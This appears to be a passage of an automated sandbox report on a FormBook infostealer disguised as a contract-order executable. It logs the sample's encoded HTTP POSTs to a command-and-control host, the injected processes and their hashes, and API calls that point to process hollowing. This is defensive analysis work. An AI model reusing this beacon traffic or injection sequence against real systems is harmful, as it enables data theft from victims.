                                                9 | 192.168.2.4 | 50011 | 23.225.159.42 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:17:01.733335018 CET | 798 | OUT | POST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=tC/0IqfYg3RQpdD0Eyr7VCtfOZ9WPagYOCZEjjvbwr585c/mijsZvhDAFROa5dBALOFmZE/tzlERLY8TqRhwpCM2ZofPDy1BNUWxqxy72Vo6YS5GZgNJH+CUx+42DKOu7F7pwnO6ThoCf43z9okSHwBYy5cnFqBKbWyc3oO/JBLV3NDFt08cgaokjqoh7eKc/g==
                                                Nov 20, 2024 07:17:02.265736103 CET | 525 | IN | HTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.4 | 50012 | 23.225.159.42 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:17:04.285145044 CET | 818 | OUT | POST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=tC/0IqfYg3RQq+b0GRT7UitcLZ9WVqgcOCFEjhDxxZN848PmjmYZohDARhPektBPLOZEZEztzm4RLdQTriJ/pSMoNYfJcC1BNUWxq1SV2Vw6YhhGZBNKYOCT2+42IqOi7F7HwmScTjgCf6/zkZkRMwAR/ZdbCLoQaFjHzragJwrRyLOf8FdLyaMX+thV2d3VkiEnctG4x27T9uDQz1+0qMo=
                                                Nov 20, 2024 07:17:04.785247087 CET | 525 | IN | HTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.4 | 50013 | 23.225.159.42 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:17:06.847160101 CET | 10900 | OUT | POST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=tC/0IqfYg3RQq+b0GRT7UitcLZ9WVqgcOCFEjhDxxZV84PHmhFAZphDAShPTktBSLOBAZEPbzg0RZLETsTJ/iSMoSIfIDy1QNUG1qx2V2Vw6YnNGOANKLeCUx+46DKOO7Fi6wmWqUSACfaPz/LMRQgAfspdDCL1OaDHLzqeGJwfR/fP7v2MIq5g99NlJvtr7hV0Dfp2auHDtnZyCnAX+oarh//2Hn5kXoYhZ9tkyyydw+HyQfZAPOhGkxrdRYvbI7mFjoANxCDyvuHClMvIeCzCEK/IGS+7FpNgKSvFh2cNiWVxzz7uHVwZvuAAy0iWCmj+s2hCER3ShQa2widYKlVK65zNKEDuddKcBCkWvxVt4ME6/mssejkrl6ccrelbQzmmbVxzGtfrwBx7H49larTI19gJq0NsFVVS9jVSkazu8QhzW5lcmNHtpvfsysvF3bJUeBF9i606gHFWmF2vEZHFCWV7by4GsAtXtY5egt5moUnjRb5Amcif2/bsrYa8/E9RwvuTvERVKJRO627Gw9ulkh8BA4cFG8Gf+edeVVZLtBr7h1Trz4Buodg5UwWIjtD5QpjD3cMQHQJRKk4dLLanAjKGiEvAu+6Eh6ZRrHZi5SMcOQ1uAzcCyyJecpYKoGQpy7kBEkXiOAA4zOgz63djZuAayLxSE4J+hcUeBDQ8aPEOBIUbu4m3Tu6u0rIjpBkeG7wteU8BPdSGJAuqgRNkCBo0U1cUERyzpt1uiw9R7WspV4mEVKbUxyjvpiySSEO/uL2ax/06Wh4sLzNpu6hVM6cqN6KamKdPeSCtYvgoVraGADCNAAmJ+d50MeYulhmogR6Ea9668BkrYc17YOhC4LJPHoFt2KtkAJamANIi87Q6TrpuxsZDhZ2tBXqafu5uoprbZi5xSX+TpqQvvtGeuPYtb6ibcMNjKqOeYx8lE349cPW0If4JirBH6eI44XE8RzCzBMnz9UBtU6W8HuHdbB4AL9rWqFFLwuDAySR3/8 [TRUNCATED]
                                                Nov 20, 2024 07:17:07.349201918 CET | 525 | IN | HTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.4 | 50014 | 23.225.159.42 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:17:09.407305002 CET | 525 | OUT | GET /dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:17:10.487343073 CET | 525 | IN | HTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                Nov 20, 2024 07:17:10.487457991 CET | 525 | IN | HTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>



                                                Target ID:0
                                                Start time:01:15:03
                                                Start date:20/11/2024
                                                Path:C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe"
                                                Imagebase:0x560000
                                                File size:503'296 bytes
                                                MD5 hash:AB7CE84E9DE63DBE7082872755E8A87C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1720676508.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:01:15:03
                                                Start date:20/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0x520000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:01:15:48
                                                Start date:20/11/2024
                                                Path:C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe"
                                                Imagebase:0x540000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:6
                                                Start time:01:15:49
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\sc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\sc.exe"
                                                Imagebase:0xab0000
                                                File size:61'440 bytes
                                                MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:01:16:02
                                                Start date:20/11/2024
                                                Path:C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe"
                                                Imagebase:0x540000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:8
                                                Start time:01:16:14
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:35.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:72
                                                  Total number of Limit Nodes:3

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F129AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: ca99791d86bb7ade7abe3dc1f1496b64542ffcbf37da32ee03c943d568083d9f
                                                  • Instruction ID: cab3cdf01025206c60306d581a365ca5de3084af6ae69e18dcbf15bf039368ba
                                                  • Opcode Fuzzy Hash: ca99791d86bb7ade7abe3dc1f1496b64542ffcbf37da32ee03c943d568083d9f
                                                  • Instruction Fuzzy Hash: 71C12470D002298FDB24CFA8C841BEEBBB1BF49310F0495AAD849B7250DB749AD5DF95

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F129AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 2bd9b736311ad6e1b0fbb34a20bce9d533143123a95f82ca01f0f1788540ce6c
                                                  • Instruction ID: e10ea12b12e644959eebf567ed0a1e32c37dc962b553feee001ce5a77ef9ea10
                                                  • Opcode Fuzzy Hash: 2bd9b736311ad6e1b0fbb34a20bce9d533143123a95f82ca01f0f1788540ce6c
                                                  • Instruction Fuzzy Hash: 08C12470D002298FDB24CFA8C841BEEBBB1BF49310F0495AAD849B7250DB749AD5DF95

                                                  Control-flow Graph

                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F12433
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 9ddf630b0a51344220c2feeae65c8a5403946a98b24a80faf0d88b7c9789d0d2
                                                  • Instruction ID: 8336a42e4ec17e329be8861d9e07798ffe3f5526f912ecdd1e7cec059e985c54
                                                  • Opcode Fuzzy Hash: 9ddf630b0a51344220c2feeae65c8a5403946a98b24a80faf0d88b7c9789d0d2
                                                  • Instruction Fuzzy Hash: A241B8B5D012588FCF00CFA9D984AEEFBF1BB49310F24902AE819B7210C378AA45CF54

                                                  Control-flow Graph

                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F12433
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 80735b668fc1f29fe14517ae2a5e91abf4de0cc832335c72342c0a40874f9d59
                                                  • Instruction ID: f154c8ff57f4d6e0c274dc92b9c0972124db75025bc43642ab40c278588c70c7
                                                  • Opcode Fuzzy Hash: 80735b668fc1f29fe14517ae2a5e91abf4de0cc832335c72342c0a40874f9d59
                                                  • Instruction Fuzzy Hash: 0441AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24902AE818B7210D774AA45DF64

                                                  Control-flow Graph

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F1256A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 08535528b7292c5b08cb87676953d9af3923f1ce5d54c2cf838f685896344514
                                                  • Instruction ID: 5b4b6a89b59190aa9f02908d43e2d0dc979fca20960363a3fb2e522c7dcb2307
                                                  • Opcode Fuzzy Hash: 08535528b7292c5b08cb87676953d9af3923f1ce5d54c2cf838f685896344514
                                                  • Instruction Fuzzy Hash: 4F41BAB5D04258DFCF10CFAAD884ADEFBB1BB49310F14942AE815B7210D774A945CF68

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F122EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d857d08f80423abf0f2bf77225edfc9aa98003ab36b773804495579ca23d295f
                                                  • Instruction ID: f722295777d1e5e1f216204cca24316b4ad9e746276f93695ac06f1e756117ae
                                                  • Opcode Fuzzy Hash: d857d08f80423abf0f2bf77225edfc9aa98003ab36b773804495579ca23d295f
                                                  • Instruction Fuzzy Hash: D241BAB5D002589FCF10CFA9D980ADEFBB1FB49310F10942AE819B7210D735A956DF58

                                                  Control-flow Graph

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F1256A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c16bead3fae205f013a74cf3b64c2a5eb88c43f843d03f7af79cd5307de85bc9
                                                  • Instruction ID: 18465cf76a96868321c994b42fe3dbcf2d4a20503415c0ef751565fd4003fef2
                                                  • Opcode Fuzzy Hash: c16bead3fae205f013a74cf3b64c2a5eb88c43f843d03f7af79cd5307de85bc9
                                                  • Instruction Fuzzy Hash: CF41CAB5D00258DFCF00CFAAD880AEEFBB1BB09310F14902AE818B7210C774A945CF68

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F122EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: fc0b4513140c718b483deb4af13c2b8d6e3224e15764b863806cef2bd5eb49cf
                                                  • Instruction ID: 75b6a6bdd614f5d28d762e1b0a04257a371a10f7ab205ac53a0114df27595e52
                                                  • Opcode Fuzzy Hash: fc0b4513140c718b483deb4af13c2b8d6e3224e15764b863806cef2bd5eb49cf
                                                  • Instruction Fuzzy Hash: 113188B9D002589FCF10CFA9D980ADEFBB5BB49310F10942AE819B7210D775A946DF68

                                                  Control-flow Graph

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F121C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 00181f6f374b3efe17ab2c988ad49eb12734fad624e85abcdbd11e434a016bdd
                                                  • Instruction ID: 277b493b5bbf3a71260dabb7b0181271661e89cedd979a64d5106c906b880d4b
                                                  • Opcode Fuzzy Hash: 00181f6f374b3efe17ab2c988ad49eb12734fad624e85abcdbd11e434a016bdd
                                                  • Instruction Fuzzy Hash: 1741CCB4D012589FCB10CFA9D884AEEFFF1AF49310F24802AE459B7244C778A985CF54

                                                  Control-flow Graph

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F121C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: e4667d5a5774eba6abe3e054ead67986aec09f27d42d57e5d42fe09c46c3a597
                                                  • Instruction ID: 2c37283294f870d932168e073fe4c694b61a06fb16a75bba59ab3deb18329e1c
                                                  • Opcode Fuzzy Hash: e4667d5a5774eba6abe3e054ead67986aec09f27d42d57e5d42fe09c46c3a597
                                                  • Instruction Fuzzy Hash: E031BEB5D002589FCB10CFA9D984AEEFBF1BB49310F24802AE418B7240C778A985CF54

                                                  Control-flow Graph

                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00F120A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 54d0fcd81712a90923e30c25fae25eaa47ff4a54b138691ab3d16f499ec5cae7
                                                  • Instruction ID: 1a63ef7bbd498ca9388b3bb72d735ec0b25e30d927cc1976ba1603b683c7b85f
                                                  • Opcode Fuzzy Hash: 54d0fcd81712a90923e30c25fae25eaa47ff4a54b138691ab3d16f499ec5cae7
                                                  • Instruction Fuzzy Hash: 8631EAB5D012189FCB14CFA9D880ADEFBB0AF49320F10802AE819B7310C775A881CF98

                                                  Control-flow Graph

                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00F120A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: f95f46b4d2fd1f17f638f584f8f274fe30cceaab79cf01c83545fe625ebb5a48
                                                  • Instruction ID: ead18fd05be019aad1e8619827aa8ec8036ca8e394917307a56ee24a423e21f6
                                                  • Opcode Fuzzy Hash: f95f46b4d2fd1f17f638f584f8f274fe30cceaab79cf01c83545fe625ebb5a48
                                                  • Instruction Fuzzy Hash: FF31BBB5D012189FCB14CFA9D984ADEFBB4BF49320F14942AE819B7310C775A945CF98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Execution Graph

                                                  Execution Coverage:1.2%
                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                  Signature Coverage:5%
                                                  Total number of Nodes:141
                                                  Total number of Limit Nodes:16

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 131 417da3-417dbf 132 417dc7-417dcc 131->132 133 417dc2 call 42fa43 131->133 134 417dd2-417de0 call 430043 132->134 135 417dce-417dd1 132->135 133->132 138 417df0-417e01 call 42e503 134->138 139 417de2-417ded call 4302e3 134->139 144 417e03-417e17 LdrLoadDll 138->144 145 417e1a-417e1d 138->145 139->138 144->145
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E15
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 42cda3-42cddc call 4048e3 call 42dff3 NtClose
                                                  APIs
                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDD7
                                                  Memory Dump Source
